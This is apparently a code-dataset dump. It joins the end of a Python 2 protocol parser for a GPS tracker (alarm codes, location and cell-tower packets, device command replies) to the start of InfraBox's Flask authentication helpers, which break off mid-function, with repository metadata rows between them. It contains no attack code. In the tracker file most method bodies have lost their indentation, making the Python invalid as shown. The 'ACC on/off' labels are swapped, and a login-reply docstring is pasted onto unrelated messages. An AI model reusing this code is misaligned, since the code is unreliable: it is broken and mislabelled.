    DOOR_ALARM = TypeValue(0x14,u'Door alarm')
    LOW_POWER_SHUTDOWN = TypeValue(0x15,u'Low-battery shutdown alarm')
    SOUND_ALARM = TypeValue(0x16,u'Sound-triggered alarm')
    FAKE_STATION = TypeValue(0x17,u'Fake base station alarm')
    OPEN_BOX = TypeValue(0x18,u'Cover-opened alarm')
    BATTERY_LOW = TypeValue(0x19,u'Internal battery low alarm')
    START_SLEEP = TypeValue(0x20,u'Enter deep sleep alarm')
    # 0x21 reserved
    # 0x22 reserved
    FALL = TypeValue(0x23,u'Fall alarm')
    # 0x24 reserved
    LIGHT_ALARM = TypeValue(0x25,u'Light-sensor alarm')
    SHUTDOWN_2 = TypeValue(0x28,u'Active offline (shutdown) alarm')
    SPEED_UP_ACCEL = TypeValue(0x29,u'Harsh acceleration')
    TURN_LEFT = TypeValue(0x2A,u'Harsh left turn alarm')
    TURN_RIGHT = TypeValue(0x2B,u'Harsh right turn alarm')
    COLLISION = TypeValue(0x2C,u'Collision alarm')
    SPEED_DOWN_ACCEL = TypeValue(0x30,u'Harsh deceleration')
    GROUP_LEAVE = TypeValue(0x31,u'Leave-group alarm')
    FLIP = TypeValue(0x32,u'Removal/flip alarm')
    LOCK = TypeValue(0x33,u'Lock engaged report')
    UNLOCK = TypeValue(0x34,u'Unlock report')
    UNLOCK_UNNORMAL = TypeValue(0x35,u'Abnormal unlock alarm')
    UNLOCK_FAIL = TypeValue(0x36,u'Unlock failure alarm')
    ACC_ON = TypeValue(0xFF,u'ACC off')
    ACC_OFF = TypeValue(0xFE,u'ACC on')
table = {}
@staticmethod
def init_table():
attrs = [s for s in dir(AlarmType) if not s.startswith('__')]
for k in attrs:
attr = getattr(AlarmType,k)
if not callable(attr) and not isinstance(attr,dict):
# print k,attr
AlarmType.table[attr.value] = attr
@staticmethod
def get_name(type_id):
alarm = AlarmType.table.get(type_id)
name = ''
if alarm:
name = alarm.comment
return name
AlarmType.init_table()
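# Hedged example (added): look up the human-readable name for an alarm byte
# received from the device.
#   AlarmType.get_name(0x01) -> 'SOS alarm'
#   AlarmType.get_name(0x7F) -> ''  (unknown types fall back to an empty string)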
class VoltageValue(object):
    EMPTY = TypeValue(0x00,u'No battery (powered off)')
    L1 = TypeValue(0x01,u'Extremely low battery (not enough for calls, SMS, etc.)')
    L2 = TypeValue(0x02,u'Very low battery (low-battery alarm)')
    L3 = TypeValue(0x03,u'Low battery (normal use still possible)')
    L4 = TypeValue(0x04,u'Medium battery')
    L5 = TypeValue(0x05,u'High battery')
    L6 = TypeValue(0x06,u'Very high battery')
    # Battery percentage reference: 6=100% 5=70% 4=40% 3=15% 2=5% 1=1%
def __init__(self):
self.value = self.EMPTY
class GSMSignalValue(object):
    EMPTY = TypeValue(0x00,u'No signal')
    L1 = TypeValue(0x01,u'Extremely weak signal')
    L2 = TypeValue(0x02,u'Weak signal')
    L3 = TypeValue(0x03,u'Good signal')
    L4 = TypeValue(0x04,u'Strong signal')
def __init__(self):
self.value = self.EMPTY
class DeviceSimpleInfo(object):
def __init__(self):
        self.oil_bit7 = DISCONNECT # 1: fuel/power cut off
        self.gps_bit6 = GPS_NO # whether GPS has a fix
        self.charging_bit2 = CONNECTED # external power connected, charging
        self.acc_bit1 = HIGH # 1: ACC high, 0: ACC low
        self.fortify_bit0 = ON # 1: armed (fortify), 0: disarmed
def parse(self,byte):
self.oil_bit7 = byte >> 7
self.gps_bit6 = (byte >> 6) & 1
self.charging_bit2 = (byte >> 2) & 1
self.acc_bit1 = (byte >> 1) & 1
self.fortify_bit0 = byte & 1
def dict(self):
return hash_object(self)
def from_dict(self,data):
object_assign(self,data)
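# Hedged example (added): the status byte parsed above packs five flags, e.g.
#   0b11000011 -> oil_bit7=1 (fuel/power cut), gps_bit6=1 (GPS fix),
#                 charging_bit2=0, acc_bit1=1 (ACC high), fortify_bit0=1 (armed)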
class LocationReportMode(object):
"""数据点上报类型"""
T0 = TypeValue(0x00,u'定时上报')
T1 = TypeValue(0x01,u'定距上报')
T2 = TypeValue(0x02,u'拐点上传')
T3 = TypeValue(0x03,u'ACC 状态改变上传')
T4 = TypeValue(0x04,u'从运动变为静止状态后,补传最后一个定位点')
T5 = TypeValue(0x05,u'网络断开重连后,上报之前最后一个有效上传点')
T6 = TypeValue(0x06,u'上报模式:星历更新强制上传 GPS 点')
T7 = TypeValue(0x07,u'上报模式:按键上传定位点')
T8 = TypeValue(0x08,u'上报模式:开机上报位置信息')
T9 = TypeValue(0x09,u'上报模式:未使用')
Ta = TypeValue(0x0a,u'上报模式:设备静止后上报最后的经纬度,但时间更新')
Tb = TypeValue(0x0b,u'WIFI 解析经纬度上传包')
Tc = TypeValue(0x0c,u'上报模式:LJDW(立即定位)指令上报')
Td = TypeValue(0x0d,u'上报模式:设备静止后上报最后的经纬度')
Te = TypeValue(0x0e,u'上报模式:GPSDUP 上传(下静止状态定时上传)')
def __init__(self):
self.value = self.T0
class LocationData(object):
def __init__(self):
self.ymdhms = ''
self.satellite = 0
self.lon = 0
self.lat = 0
self.speed = 0
self.heading = 0
self.mode = 'r' # real-time or differential fix: r / d
self.located = 'y' # y or n, whether a GPS fix has been obtained
self.west_east = 'e' # w or e, east or west longitude
self.north_south = 'n' # n or s
# self.mcc = 0
# self.mnc = 0
# self.lac = 0
# self.cell_id = 0
# self.lang = 0
def dict(self):
return hash_object(self)
def from_dict(self,data):
object_assign(self,data)
def parse_time(self,buf):
y = 2000 + buf.read_uint8()
m = buf.read_uint8()
d = buf.read_uint8()
h = buf.read_uint8()
M = buf.read_uint8()
s = buf.read_uint8()
# dt = datetime.datetime(y, m, d, h, M, s) + datetime.timedelta(hours=8)
# y = dt.year
# m = dt.month
# d = dt.day
# h = dt.hour
# M = dt.minute
# s = dt.second
# self.ymdhms = '{}{}{} {}:{}:{}'.format(y,m,d,h,M,s)
self.ymdhms = '{}{:02d}{:02d} {:02d}:{:02d}:{:02d}'.format(y, m, d, h, M, s)
def parse(self,buf ):
# y = 2000 + buf.read_uint8()
# m = buf.read_uint8()
# d = buf.read_uint8()
# h = buf.read_uint8()
# M = buf.read_uint8()
# s = buf.read_uint8()
# dt = datetime.datetime(y,m,d,h,M,s) + datetime.timedelta(hours=8)
# y = dt.year
# m = dt.month
# d = dt.day
# h = dt.hour
# M = dt.minute
# s = dt.second
# # self.ymdhms = '{}{}{} {}:{}:{}'.format(y,m,d,h,M,s)
# self.ymdhms = '{}{:02d}{:02d} {:02d}:{:02d}:{:02d}'.format(y, m, d, h, M, s)
self.parse_time(buf)
ui8 = buf.read_uint8()
v = [ (ui8>>4) & 0xf,(ui8 & 0xf)]
# self.satellite = '%s %s'% tuple(v)
self.satellite = v[1]
self.lat = buf.read_uint32()/1800000.
self.lon = buf.read_uint32() / 1800000.
self.speed = buf.read_uint8()
ui16 = buf.read_uint16()
self.heading = ui16 & 0b1111111111
self.north_south = 's'
if (ui16>>10) & 0x01 :
self.north_south = 'n'
self.west_east = 'w'
if (ui16>>11) & 0x01 == 0:
self.west_east = 'e'
self.located = 'n'
if (ui16>>12) & 0x01 == 1:
self.located = 'y'
self.mode = 'd'
if (ui16>>13) & 0x01 == 0 :
self.mode = 'r'
# self.mcc = buf.read_uint16()
# self.mnc = buf.read_uint8()
# self.lac = buf.read_uint16()
# v = buf.read_bytes(3)
# self.cell_id =v
# self.lang = buf.read_uint16()
# print self.__dict__
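# Worked example (illustrative, hypothetical value): the 16-bit course/status
# word read above packs the heading in bits 0-9 and flags in bits 10-13.
# For ui16 = 0x14B4 = 0b0001010010110100:
#   heading = 0x14B4 & 0b1111111111 = 180 degrees
#   bit 10 = 1 -> north_south = 'n'
#   bit 11 = 0 -> west_east   = 'e'
#   bit 12 = 1 -> located     = 'y'
#   bit 13 = 0 -> mode        = 'r' (real-time fix, not differential)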
class LocationDataExt(object):
def __init__(self):
# LocationData.__init__(self)
self.mcc = 0
self.mnc = 0
self.lac = 0
self.cell_id = 0
self.simple_info = DeviceSimpleInfo()
self.voltage = VoltageValue.EMPTY.value
self.gsm = GSMSignalValue.EMPTY.value
self.alarm = AlarmType.OK.value
self.lang = LanguageValue.CHINESE # alarm language
def dict(self):
data = self.simple_info.dict()
data.update(hash_object(self,excludes=('simple_info',)))
return data
def from_dict(self,data):
object_assign(self,data)
self.simple_info = DeviceSimpleInfo()
object_assign(self.simple_info,data)
def parse(self,buf ):
# LocationData.parse(self,buf)
self.mcc = buf.read_uint16()
self.mnc = buf.read_uint8()
self.lac = buf.read_uint16()
self.cell_id = tool_format_ci_value( buf.read_bytes(3))
self.simple_info.parse(buf.read_uint8())
self.voltage = buf.read_uint8()
self.gsm = buf.read_uint8()
self.alarm = buf.read_uint8()
self.lang = buf.read_uint8()
class MessageGpsLocation(MessageBase):
"""gps 定位包"""
Type = PacketType.GpsLocation
def __init__(self):
MessageBase.__init__(self)
self.location = LocationData()
# self.acc = LOW
# self.rpt_mode = LocationReportMode.T0.value # report mode
# self.up_mode = GPS_UP_MODE_REAL # real-time or appended upload
# self.miles = 0 # mileage
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageGpsLocation()
msg.extra = extra
msg.location.parse(buf)
# msg.acc = buf.read_uint8()
# msg.rpt_mode = buf.read_uint8()
# msg.up_mode = buf.read_uint8()
# msg.miles = buf.read_uint32()
return msg
def dict(self):
data = hash_object(self,excludes=('location',))
data.update(self.location.dict() )
return data
def from_dict(self,data):
self.location.from_dict(data)
# self.acc = data.get('acc',LOW)
# self.rpt_mode = data.get('rpt_mode',LocationReportMode.T0.value)
# self.up_mode = data.get('up_mode',GPS_UP_MODE_REAL)
# self.miles = data.get('miles',0)
class MessageLbsStationExtension(MessageBase):
"""基站定位包
460 1 9649 28657 23.1067600250244 114.416069030762 广东省惠州市惠城区江北街道水北
"""
Type = PacketType.LbsStationExtension
def __init__(self):
MessageBase.__init__(self)
self.ymdhms = ''
self.mcc = 0
self.mnc = 0
self.lac = 0
self.cell_id = 0
self.rssi = 0
self.signal = 0
self.lac1 = 0
self.ci1 = 0
self.rssi1 = 0
self.lac2 = 0
self.ci2 = 0
self.rssi2 = 0
self.lac3 = 0
self.ci3 = 0
self.rssi3 = 0
self.lac4 = 0
self.ci4 = 0
self.rssi4 = 0
self.lac5 = 0
self.ci5 = 0
self.rssi5 = 0
self.lac6 = 0
self.ci6 = 0
self.rssi6 = 0
self.lang = 0
def parse_time(self,buf):
y = 2000 + buf.read_uint8()
m = buf.read_uint8()
d = buf.read_uint8()
h = buf.read_uint8()
M = buf.read_uint8()
s = buf.read_uint8()
# dt = datetime.datetime(y, m, d, h, M, s) + datetime.timedelta(hours=8)
# y = dt.year
# m = dt.month
# d = dt.day
# h = dt.hour
# M = dt.minute
# s = dt.second
self.ymdhms = '{}{:02d}{:02d} {:02d}:{:02d}:{:02d}'.format(y, m, d, h, M, s)
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageLbsStationExtension()
msg.extra = extra
msg.parse_time(buf)
msg.mcc = buf.read_uint16()
msg.mnc = buf.read_uint8()
msg.lac = buf.read_uint16()
msg.cell_id = tool_format_ci_value( buf.read_bytes(3))
msg.rssi = buf.read_uint8()
msg.signal = msg.rssi
msg.lac1 = buf.read_uint16()
msg.ci1 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi1 = buf.read_uint8()
msg.lac2 = buf.read_uint16()
msg.ci2 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi2 = buf.read_uint8()
msg.lac3 = buf.read_uint16()
msg.ci3 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi3 = buf.read_uint8()
msg.lac4 = buf.read_uint16()
msg.ci4 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi4 = buf.read_uint8()
msg.lac5 = buf.read_uint16()
msg.ci5 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi5 = buf.read_uint8()
msg.lac6 = buf.read_uint16()
msg.ci6 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi6 = buf.read_uint8()
return msg
def tool_format_ci_value(bytes):
value = ''.join(map(lambda _:'%02x'%_,map(ord,bytes) ))
# value = '0'+bytes
value = int(value,16)
return value
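# Illustrative example (hypothetical cell-id bytes): the three raw bytes of a
# cell id are hex-encoded and read back as a single integer, so
#   tool_format_ci_value('\x01\xe2\x40') == 0x01e240 == 123456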
class MessageHeartBeat(MessageBase):
""""""
Type = PacketType.HeartBeat
def __init__(self):
MessageBase.__init__(self)
self.simple_info = DeviceSimpleInfo()
self.voltage = VoltageValue.EMPTY.value
self.gsm = GSMSignalValue.EMPTY.value
self.lang = LanguageValue.CHINESE
def response(self):
"""回复心跳消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageHeartBeat()
msg.extra = extra
msg.simple_info.parse(buf.read_uint8())
msg.voltage = buf.read_uint8()
msg.gsm = buf.read_uint8()
msg.lang = buf.read_uint16()
return msg
def dict(self):
data = self.simple_info.dict()
data.update({'voltage':self.voltage,
'gsm':self.gsm,
'lang':self.lang
})
return data
def from_dict(self,data):
self.simple_info.from_dict(data)
self.voltage = data.get('voltage',VoltageValue.EMPTY.value)
self.gsm = data.get('gsm',GSMSignalValue.EMPTY.value)
self.lang = data.get('lang',LanguageValue.CHINESE)
# class MessageDeviceRespOnlineCN(MessageBase):
# """"""
# Type = PacketType.DeviceRespOnlineCN
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageDeviceRespOnlineCN()
# msg.extra = extra
# return msg
# class MessageDeviceRespOnlineEN(MessageBase):
# """"""
# Type = PacketType.DeviceRespOnlineEN
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageDeviceRespOnlineEN()
# msg.extra = extra
# return msg
class MessageAlarmData(MessageBase):
"""gps 报警消息包"""
Type = PacketType.GpsAlarm
def __init__(self):
MessageBase.__init__(self)
self.location = LocationData()
self.lbs_size = 0
self.location_ext = LocationDataExt()
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
if self.location_ext.lang == LanguageValue.CHINESE:
netpack.type = PacketType.AddressCNResp.value
msg = MessageAddressCNResp()
netpack.set_payload(msg.marshall())
elif self.location_ext.lang == LanguageValue.ENGLISH:
netpack.type = PacketType.AddressENResp.value
msg = MessageAddressENResp()
netpack.set_payload(msg.marshall())
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageAlarmData()
msg.extra = extra
msg.location.parse(buf)
msg.lbs_size = buf.read_uint8()
msg.location_ext.parse(buf)
# msg.simple_info.parse(buf.read_uint8())
# msg.voltage = buf.read_uint8()
# msg.gsm = buf.read_uint8()
# msg.alarm = buf.read_uint8()
# msg.lang = buf.read_uint8()
# msg.miles = buf.read_uint32()
return msg
def dict(self):
data = self.location.dict()
data.update(self.location_ext.dict())
data.update(hash_object(self,excludes=('location','location_ext')))
# data.update(self.simple_info.dict())
# data.update({
# 'voltage':self.voltage,
# 'gsm':self.gsm,
# 'alarm':self.alarm,
# 'lang':self.lang,
# 'miles':self.miles
# })
return data
def from_dict(self,data):
self.location.from_dict(data)
object_assign(self,data)
self.location_ext.from_dict(data)
# self.simple_info.from_dict(data)
# self.voltage = data.get('voltage',VoltageValue.EMPTY.value)
# self.gsm = data.get('gsm',GSMSignalValue.EMPTY.value)
# self.alarm = data.get('alarm',AlarmType.OK.value)
# self.lang = data.get('lang',LanguageValue.CHINESE)
# self.miles = data.get('miles',0)
# class MessageFenceAlarm(MessageBase):
# """"""
# Type = PacketType.FenceAlarm
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageFenceAlarm()
# msg.extra = extra
#
# return msg
class MessageLbsAlarmData(MessageBase):
"""lbs 报警包"""
Type = PacketType.LbsAlarm
def __init__(self):
MessageBase.__init__(self)
self.location_ext = LocationDataExt()
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
if self.location_ext.lang == LanguageValue.CHINESE:
netpack.type = PacketType.AddressCNResp.value
msg = MessageAddressCNResp()
netpack.set_payload(msg.marshall())
elif self.location_ext.lang == LanguageValue.ENGLISH:
netpack.type = PacketType.AddressENResp.value
msg = MessageAddressENResp()
netpack.set_payload(msg.marshall())
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageLbsAlarmData()
msg.extra = extra
return msg
def dict(self):
data = self.location_ext.dict()
data.update(hash_object(self, excludes=('location', 'location_ext')))
return data
def from_dict(self, data):
object_assign(self, data)
self.location_ext.from_dict(data)
# class MessageGpsAddressReq(MessageBase):
# """"""
# Type = PacketType.GpsAddressReq
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageGpsAddressReq()
# msg.extra = extra
# return msg
# class MessageLbsAddressReq(MessageBase):
# """"""
# Type = PacketType.LbsAddressReq
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageLbsAddressReq()
# msg.extra = extra
# return msg
class MessageOnlineCommand(MessageBase,DownStream):
"""在线设备发送命令"""
Type = PacketType.OnlineCommandSet
def __init__(self,sequence=0,content='',lang = 0x01):
MessageBase.__init__(self)
self.sequence = sequence
self.content = content
self.lang = lang
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageOnlineCommand()
msg.extra = extra
size = buf.read_uint8()
body_size = size - 4
msg.sequence = buf.read_uint32()
msg.content = buf.read_bytes(body_size)
msg.lang = buf.read_uint16()
return msg
def packet(self):
from packet import NetWorkPacket
pkt = NetWorkPacket()
buf = ByteBuf()
size = 4 + len(self.content)
buf.write_uint8(size)
buf.write_uint32(self.sequence)
buf.write_bytes(self.content)
buf.write_uint16(self.lang)
pkt.set_payload(buf.bytes)
pkt.type = self.Type.value
return pkt
def parseContent(self):
return parseContent(self.content)
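# Illustrative sketch (hypothetical command text): building a downstream command
# packet for an online device. packet() writes a one-byte length (sequence plus
# body), the four-byte sequence number, the ASCII command body and the two-byte
# language flag, assuming packet.NetWorkPacket.to_bytes() as used elsewhere here:
#   cmd = MessageOnlineCommand(sequence=1, content='STATUS#', lang=0x01)
#   raw = cmd.packet().to_bytes()  # bytes ready to send to the device socket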
def parseContent(content):
"""解析上报的设备信息,返回 kv 数据对"""
data={}
print 'Content:',content
cap = '[VERSION]'
if content.find(cap) == 0:
ver = content.split(cap)[-1]
data['ver'] = ver
cap = 'IMEI:'
if content.find(cap) == 0:
items = map(lambda _:_.strip(),content.split(';'))
items = filter(lambda _:_,items)
kvs = dict(map(lambda _:_.split(":"),items))
for k,v in kvs.items():
if k =='IMEI':
data['imei'] = v
if k=='TIMER':
t1,t2,t3 = v.split(',')
data['gps_timer'] = t3 #int(t3) * 60
data['lbs_timer'] = t1 #int(t1) * 60
if k == 'SOS':
p1,p2,p3,p4 = v.split(',')
data['sos_1'] = p1
data['sos_2'] = p2
data['sos_3'] = p3
data['sos_4'] = p4
cap = 'SERVER'
if content.find(cap) == 0:
fs = content.split(',')
if fs[1] == '1':
data['server_mode'] = 'domain'
data['server_domain'] = fs[2]
else:
data['server_ip'] = fs[2]
data['server_port'] = fs[3]
cap ='HBT'
if content.find(cap)==0:
fs = content.split(':')
data['heartbeat_timer'] = int(fs[1])
cap = 'FenceType'
if content.find(cap) == 0:
items = map(lambda _: _.strip(), content.split(','))
onoff = items[1].lower()
del items[1]
kvs = dict(map(lambda _: _.split(":"), items))
data['fence_enable'] = onoff
for k, v in kvs.items():
if k == 'FenceType':
data['fence_type'] = v.lower()
if k=='Latitude':
data['fence_cy'] = v
if k=='Longitude':
data['fence_cx'] = v
if k=='radius':
data['fence_radius'] = v[0:-1]
if k=='in out':
data['fence_inout'] = v
if k == 'alarm type':
data['fence_alarm_type'] = v
return data
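# Illustrative example (hypothetical reply string): a device status reply such as
#   'IMEI:868120145233604;TIMER:30,60,10;SOS:111,222,333,444;'
# is parsed into
#   {'imei': '868120145233604', 'lbs_timer': '30', 'gps_timer': '10',
#    'sos_1': '111', 'sos_2': '222', 'sos_3': '333', 'sos_4': '444'}
# (TIMER is split as t1,t2,t3 with t1 -> lbs_timer and t3 -> gps_timer).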
class MessageOnlineCommandQuery(MessageOnlineCommand):
"""在线设备发送查询命令"""
Type = PacketType.OnlineCommandResponse
def __init__(self):
MessageOnlineCommand.__init__(self)
# class MessageOnlineCommandSet(MessageOnlineCommand):
# """在线设备发送设置命令"""
# Type = PacketType.OnlineCommandSet
# def __init__(self):
# MessageOnlineCommand.__init__(self)
class MessageAdjustTime(MessageBase):
"""校时包"""
Type = PacketType.AdjustTime
def __init__(self):
MessageBase.__init__(self)
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
now = datetime.datetime.now()
year = now.year - 2000
month = now.month
day = now.day
hour = now.hour
minute = now.minute
second = now.second
data = struct.pack('B'*6,year,month,day,hour,minute,second)
netpack.set_payload(data)
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageAdjustTime()
msg.extra = extra
return msg
class MessageGenericMessage(MessageBase):
"""信息传输通用包"""
Type = PacketType.GenericMessage
def __init__(self):
MessageBase.__init__(self)
self.type = 0 # information type
self.content = '' # information content, AT-command style text
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
import base64
buf = ByteBuf(bytes)
msg = MessageGenericMessage()
msg.extra = extra
msg.type = buf.read_uint8()
msg.content = buf.bytes[buf.index:]
if msg.type == 4: # terminal status sync information (ASCII)
pass
else: # convert to base64
msg.content = base64.b64encode(msg.content)
return msg
class MessageAddressCNResp(MessageBase):
""""""
Type = PacketType.AddressCNResp
def __init__(self):
MessageBase.__init__(self)
self.size = 0
self.sequence = 0
self.alarmsms = 'X'*8
self.address = ''
self.tel = '0'*21
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageAddressCNResp()
msg.extra = extra
return msg
def marshall(self):
buf = ByteBuf()
self.size = 39 + len(self.address)
buf.write_uint8(self.size)
buf.write_uint32(self.sequence)
buf.write_bytes(self.alarmsms)
buf.write_bytes('&&')
buf.write_bytes(self.address)
buf.write_bytes('&&')
buf.write_bytes(self.tel)
buf.write_bytes('##')
return buf.bytes
class MessageAddressENResp(MessageAddressCNResp):
""""""
Type = PacketType.AddressENResp
def __init__(self):
MessageAddressCNResp.__init__(self)
def registerMessageObject(msgcls):
MessageClsDict[msgcls.Type.value] = msgcls
# print globals().keys()
for key,value in locals().items():
if key.find('Message')==0 and key not in ('MessageClsDict','MessageBase'):
registerMessageObject(value)
# print MessageClsDict.values()
# @singleton
# class MessageOnlineCommandAllocator(object):
# def __init__(self):
# self.seq_gen = None
#
# def setSequenceGeneroator(self,generator):
# self.seq_gen = generator
#
# def createCommand(self):
# cmd = MessageOnlineCommand(self.seq_gen.next())
# return cmd
| 28.273715
| 86
| 0.57764
|
5955113d24d812160700b32a80d74653750634d2
| 10,128
|
py
|
Python
|
src/pyinfraboxutils/ibflask.py
|
sap-coutantm/InfraBox
|
462b7aca3c730148c5ced6c9fffaa6b3172d1399
|
[
"Apache-2.0"
] | null | null | null |
src/pyinfraboxutils/ibflask.py
|
sap-coutantm/InfraBox
|
462b7aca3c730148c5ced6c9fffaa6b3172d1399
|
[
"Apache-2.0"
] | null | null | null |
src/pyinfraboxutils/ibflask.py
|
sap-coutantm/InfraBox
|
462b7aca3c730148c5ced6c9fffaa6b3172d1399
|
[
"Apache-2.0"
] | null | null | null |
import base64
from functools import wraps
from flask import Flask, g, jsonify, request, abort
from pyinfraboxutils import get_logger
from pyinfraboxutils.db import DB, connect_db
from pyinfraboxutils.token import decode
app = Flask(__name__)
app.url_map.strict_slashes = False
logger = get_logger('ibflask')
def get_token():
auth = dict(request.headers).get('Authorization', None)
cookie = request.cookies.get('token', None)
if auth:
if auth.startswith("Basic "):
auth = auth.split(" ")[1]
try:
decoded = base64.b64decode(auth)
except:
logger.warn('could not base64 decode auth header')
abort(401, 'Unauthorized')
s = decoded.split('infrabox:')
if len(s) != 2:
logger.warn('Invalid auth header format')
abort(401, 'Unauthorized')
try:
token = decode(s[1])
except Exception as e:
logger.exception(e)
abort(401, 'Unauthorized')
return token
elif auth.startswith("token ") or auth.startswith("bearer "):
token = auth.split(" ")[1]
try:
token = decode(token.encode('utf8'))
except Exception as e:
logger.exception(e)
abort(401, 'Unauthorized')
return token
else:
logger.warn('Invalid auth header format')
abort(401, 'Unauthorized')
elif cookie:
token = cookie
try:
token = decode(token.encode('utf8'))
except Exception as e:
logger.exception(e)
abort(401, 'Unauthorized')
return token
else:
logger.info('No auth header')
abort(401, 'Unauthorized')
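# Illustrative client-side sketch (hypothetical token value): the Basic variant
# above expects base64("infrabox:<jwt>"), e.g.
#   import base64
#   headers = {'Authorization': 'Basic ' + base64.b64encode('infrabox:' + jwt)}
# while the token/bearer variants send the JWT directly:
#   headers = {'Authorization': 'bearer ' + jwt}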
try:
#pylint: disable=ungrouped-imports,wrong-import-position
from pyinfraboxutils import dbpool
logger.info('Using DB Pool')
@app.before_request
def before_request():
g.db = dbpool.get()
def release_db():
db = getattr(g, 'db', None)
if not db:
return
dbpool.put(db)
g.db = None
g.release_db = release_db
except:
@app.before_request
def before_request():
g.db = DB(connect_db())
def release_db():
db = getattr(g, 'db', None)
if not db:
return
db.close()
g.db = None
g.release_db = release_db
@app.teardown_request
def teardown_request(_):
try:
release_db = getattr(g, 'release_db', None)
if release_db:
release_db()
except Exception as e:
logger.error(_)
logger.exception(e)
@app.errorhandler(404)
def not_found(error):
msg = error.description
if not msg:
msg = 'Not Found'
return jsonify({'message': msg, 'status': 404}), 404
@app.errorhandler(401)
def unauthorized(error):
return jsonify({'message': error.description, 'status': 401}), 401
@app.errorhandler(400)
def bad_request(error):
return jsonify({'message': error.description, 'status': 400}), 400
def OK(message, data=None):
d = {'message': message, 'status': 200}
if data:
d['data'] = data
return jsonify(d)
def token_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
g.token = get_token()
return f(*args, **kwargs)
return decorated_function
def check_job_belongs_to_project(f):
@wraps(f)
def decorated_function(*args, **kwargs):
project_id = kwargs.get('project_id')
job_id = kwargs.get('job_id')
assert project_id
assert job_id
r = g.db.execute_one('''
SELECT id
FROM job
WHERE id = %s AND project_id = %s
''', [job_id, project_id])
if not r:
logger.debug('job does not belong to project')
abort(404)
return f(*args, **kwargs)
return decorated_function
def job_token_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
token = get_token()
if token['type'] != 'job':
logger.warn('token type is not job but "%s"', token['type'])
abort(401, 'Unauthorized')
job_id = token['job']['id']
r = g.db.execute_one('''
SELECT state, project_id, name
FROM job
WHERE id = %s''', [job_id])
if not r:
logger.warn('job not found')
abort(401, 'Unauthorized')
job_state = r[0]
if job_state not in ('queued', 'running', 'scheduled'):
abort(401, 'Unauthorized')
token['job']['state'] = r[0]
token['job']['name'] = r[2]
token['project'] = {}
token['project']['id'] = r[1]
g.token = token
return f(*args, **kwargs)
return decorated_function
def validate_job_token(token):
job_id = token['job']['id']
r = g.db.execute_one('''
SELECT state, project_id, name
FROM job
WHERE id = %s''', [job_id])
if not r:
logger.warn('job not found')
abort(401, 'Unauthorized')
job_state = r[0]
if job_state not in ('queued', 'running', 'scheduled'):
abort(401, 'Unauthorized')
token['job']['state'] = r[0]
token['job']['name'] = r[2]
token['project'] = {}
token['project']['id'] = r[1]
g.token = token
def is_collaborator(user_id, project_id, db=None):
if not db:
db = g.db
u = db.execute_many('''
SELECT co.*
FROM collaborator co
INNER JOIN "user" u
ON u.id = co.user_id
AND u.id = %s
AND co.project_id = %s
''', [user_id, project_id])
return u
def is_public(project_id, project_name):
if project_id:
p = g.db.execute_one_dict('''
SELECT public
FROM project
WHERE id = %s
''', [project_id])
if not p:
abort(404, 'Project not found')
if p['public']:
return True
elif project_name:
p = g.db.execute_one_dict('''
SELECT public
FROM project
WHERE name = %s
''', [project_name])
if not p:
abort(404, 'Project not found')
if p['public']:
return True
else:
logger.warn('no project_id or project_name')
abort(401, 'Unauthorized')
return False
def validate_user_token(token, check_project_access, project_id, check_project_owner):
u = g.db.execute_one('''
SELECT id FROM "user" WHERE id = %s
''', [token['user']['id']])
if not u:
logger.warn('user not found')
abort(401, 'Unauthorized')
if check_project_access:
if not project_id:
logger.warn('no project id')
abort(401, 'Unauthorized')
